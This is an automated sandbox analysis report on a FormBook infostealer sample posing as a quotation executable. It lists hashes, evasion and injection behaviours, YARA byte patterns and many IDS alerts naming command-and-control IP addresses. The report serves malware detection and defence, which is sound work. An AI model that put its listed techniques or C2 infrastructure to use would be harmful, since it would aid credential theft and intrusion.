Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation-27-08-24.exe

Overview

General Information

Sample name:Quotation-27-08-24.exe
Analysis ID:1499588
MD5:fcb6844bca1d8d2a4c41025b08a50799
SHA1:524dd948b1f08b4f64da958439e7c0e42b542c72
SHA256:866dc796d2727a535d138d80a3196c82dfefb4c38ac6b51f8c81ca381e035f45
Tags:exeQuotation
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Quotation-27-08-24.exe (PID: 3880 cmdline: "C:\Users\user\Desktop\Quotation-27-08-24.exe" MD5: FCB6844BCA1D8D2A4C41025B08A50799)
    • Quotation-27-08-24.exe (PID: 4932 cmdline: "C:\Users\user\Desktop\Quotation-27-08-24.exe" MD5: FCB6844BCA1D8D2A4C41025B08A50799)
    • Quotation-27-08-24.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\Quotation-27-08-24.exe" MD5: FCB6844BCA1D8D2A4C41025B08A50799)
      • uExImirYECsTjI.exe (PID: 5700 cmdline: "C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PING.EXE (PID: 7136 cmdline: "C:\Windows\SysWOW64\PING.EXE" MD5: B3624DD758CCECF93A1226CEF252CA12)
          • firefox.exe (PID: 3884 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.Quotation-27-08-24.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.Quotation-27-08-24.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f183:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.Quotation-27-08-24.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.Quotation-27-08-24.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e383:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            Timestamp:2024-08-27T08:44:26.541690+0200
            SID:2855464
            Severity:1
            Source Port:51240
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:49.521662+0200
            SID:2855464
            Severity:1
            Source Port:51209
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:46.567181+0200
            SID:2855464
            Severity:1
            Source Port:51227
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:57.183106+0200
            SID:2050745
            Severity:1
            Source Port:51212
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:42:57.183106+0200
            SID:2855465
            Severity:1
            Source Port:51212
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:36.019010+0200
            SID:2855464
            Severity:1
            Source Port:51205
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:38.435901+0200
            SID:2855464
            Severity:1
            Source Port:51243
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:15.775623+0200
            SID:2855464
            Severity:1
            Source Port:51236
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:24.196227+0200
            SID:2855464
            Severity:1
            Source Port:51201
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:08.195658+0200
            SID:2855464
            Severity:1
            Source Port:51195
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:31.613794+0200
            SID:2050745
            Severity:1
            Source Port:51242
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:44:31.613794+0200
            SID:2855465
            Severity:1
            Source Port:51242
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:10.730161+0200
            SID:2855464
            Severity:1
            Source Port:51196
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:10.668172+0200
            SID:2855464
            Severity:1
            Source Port:51234
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:00.020291+0200
            SID:2855464
            Severity:1
            Source Port:51231
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:45:06.261507+0200
            SID:2855464
            Severity:1
            Source Port:51251
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:54.707852+0200
            SID:2855464
            Severity:1
            Source Port:51248
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:29.065496+0200
            SID:2855464
            Severity:1
            Source Port:51241
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:52.052772+0200
            SID:2855464
            Severity:1
            Source Port:51210
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:02.569669+0200
            SID:2855464
            Severity:1
            Source Port:51232
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:49.164447+0200
            SID:2855464
            Severity:1
            Source Port:51228
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:05.125859+0200
            SID:2050745
            Severity:1
            Source Port:51233
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:44:05.125859+0200
            SID:2855465
            Severity:1
            Source Port:51233
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:44.030522+0200
            SID:2855464
            Severity:1
            Source Port:51226
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:08.827240+0200
            SID:2855464
            Severity:1
            Source Port:51215
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:40.939929+0200
            SID:2855464
            Severity:1
            Source Port:51244
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:26.760478+0200
            SID:2855464
            Severity:1
            Source Port:51202
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:45:08.777695+0200
            SID:2855464
            Severity:1
            Source Port:51252
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:30.551260+0200
            SID:2855464
            Severity:1
            Source Port:51222
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:46.077884+0200
            SID:2050745
            Severity:1
            Source Port:51246
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:44:46.077884+0200
            SID:2855465
            Severity:1
            Source Port:51246
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:35.764514+0200
            SID:2855464
            Severity:1
            Source Port:51224
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:33.118522+0200
            SID:2855464
            Severity:1
            Source Port:51223
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:51.708015+0200
            SID:2050745
            Severity:1
            Source Port:51229
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:43:51.708015+0200
            SID:2855465
            Severity:1
            Source Port:51229
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:19.474680+0200
            SID:2855464
            Severity:1
            Source Port:51219
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:52.159002+0200
            SID:2855464
            Severity:1
            Source Port:51247
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:11.244131+0200
            SID:2050745
            Severity:1
            Source Port:51217
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:43:11.244131+0200
            SID:2855465
            Severity:1
            Source Port:51217
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:41.157921+0200
            SID:2855464
            Severity:1
            Source Port:51207
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:38.193354+0200
            SID:2050745
            Severity:1
            Source Port:51225
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:43:38.193354+0200
            SID:2855465
            Severity:1
            Source Port:51225
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:18.320148+0200
            SID:2050745
            Severity:1
            Source Port:51237
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:44:18.320148+0200
            SID:2855465
            Severity:1
            Source Port:51237
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:13.244665+0200
            SID:2855464
            Severity:1
            Source Port:51235
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:57.244827+0200
            SID:2855464
            Severity:1
            Source Port:51249
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:23.968939+0200
            SID:2855464
            Severity:1
            Source Port:51239
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:02.685066+0200
            SID:2855464
            Severity:1
            Source Port:51213
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:29.261096+0200
            SID:2050745
            Severity:1
            Source Port:51204
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:42:29.261096+0200
            SID:2855465
            Severity:1
            Source Port:51204
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:24.580528+0200
            SID:2050745
            Severity:1
            Source Port:51221
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:43:24.580528+0200
            SID:2855465
            Severity:1
            Source Port:51221
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:06.164860+0200
            SID:2855464
            Severity:1
            Source Port:51214
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:54.626100+0200
            SID:2855464
            Severity:1
            Source Port:51211
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:15.821716+0200
            SID:2050745
            Severity:1
            Source Port:51198
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:42:15.821716+0200
            SID:2855465
            Severity:1
            Source Port:51198
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:21.628008+0200
            SID:2855464
            Severity:1
            Source Port:51199
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:13.269307+0200
            SID:2855464
            Severity:1
            Source Port:51197
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:41:52.626113+0200
            SID:2050745
            Severity:1
            Source Port:51193
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:41:52.626113+0200
            SID:2855465
            Severity:1
            Source Port:51193
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:57.481759+0200
            SID:2855464
            Severity:1
            Source Port:51230
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:59.821052+0200
            SID:2050745
            Severity:1
            Source Port:51250
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:44:59.821052+0200
            SID:2855465
            Severity:1
            Source Port:51250
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:43.687957+0200
            SID:2050745
            Severity:1
            Source Port:51208
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-27T08:42:43.687957+0200
            SID:2855465
            Severity:1
            Source Port:51208
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:16.913156+0200
            SID:2855464
            Severity:1
            Source Port:51218
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:44:43.481585+0200
            SID:2855464
            Severity:1
            Source Port:51245
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:42:38.569834+0200
            SID:2855464
            Severity:1
            Source Port:51206
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-27T08:43:22.022426+0200
            SID:2855464
            Severity:1
            Source Port:51220
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Quotation-27-08-24.exeVirustotal: Detection: 33%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Quotation-27-08-24.exeJoe Sandbox ML: detected
            Source: Quotation-27-08-24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Quotation-27-08-24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uExImirYECsTjI.exe, 00000008.00000002.4568881862.0000000000F9E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Quotation-27-08-24.exe, Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdb source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_0048C010 FindFirstFileW,FindNextFileW,FindClose,9_2_0048C010
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 4x nop then xor eax, eax8_2_05818D29
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeCode function: 4x nop then pop edi8_2_05813820
            Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then xor eax, eax9_2_00479C70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then pop edi9_2_0047DBC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then mov ebx, 00000004h9_2_02EF04DF

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51206 -> 119.28.49.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51201 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51217 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51217 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51212 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51223 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51195 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51220 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51212 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51209 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51205 -> 119.28.49.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51197 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51198 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51198 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51202 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51222 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51208 -> 119.28.49.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51227 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51226 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51211 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51207 -> 119.28.49.194:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51208 -> 119.28.49.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51218 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51213 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51196 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51234 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51214 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51236 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51237 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51231 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51239 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51215 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51193 -> 92.204.210.213:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51237 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51193 -> 92.204.210.213:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51229 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51247 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51229 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51242 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51250 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51242 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51250 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51240 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51210 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51230 -> 13.248.169.48:80
